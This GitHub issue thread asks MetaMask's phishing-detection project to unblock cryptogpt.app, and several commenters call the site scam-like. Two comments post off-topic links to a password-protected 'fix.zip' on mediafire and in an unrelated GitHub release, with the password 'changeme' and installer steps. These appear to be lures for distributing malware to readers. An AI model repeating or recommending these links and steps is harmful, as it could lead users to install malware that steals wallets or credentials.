### ISSUE TITLE
[Unblock Legitimate Site] cryptogpt.app

### ISSUE THREAD

**Issue by whichperson** [MetaMask/eth-phishing-detect#79282]
**Domain:** cryptogpt.app

**Details:** We are crypto trading platform powered by AI, we want users to log in with Metamask to show their balances in the trading view. 

- [X] I have checked to make sure that [there is not a duplicate issue](https://github.com/MetaMask/eth-phishing-detect/issues)

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by whichperson** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

Sorry, where am I supposed to run this?

**Comment by PanamaPanamera** [comment]
For me it seems like crypto phishing site, sign in doesen't work only from buttons metamask sign in and sign in binance work.
Either github telegram or terms don't work

**Comment by whichperson** [comment]
> For me it seems like crypto phishing site, sign in doesen't work only from buttons metamask sign in and sign in binance work. Either github telegram or terms don't work

Because we are still building the platform so not all features work, yet. Our primary feature is connecting with MetaMask and showing balances to the user and providing insights with LLMs.

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by PanamaPanamera** [comment]
Feels fishy to me.Just my opinion.

**Comment by AlexHerman1** [comment]
does this project have any social media presence? if you are still in the building phase its hard to justify asking us for this removal when the project is non functional and seems scammy. please come back when you have something functional put together.
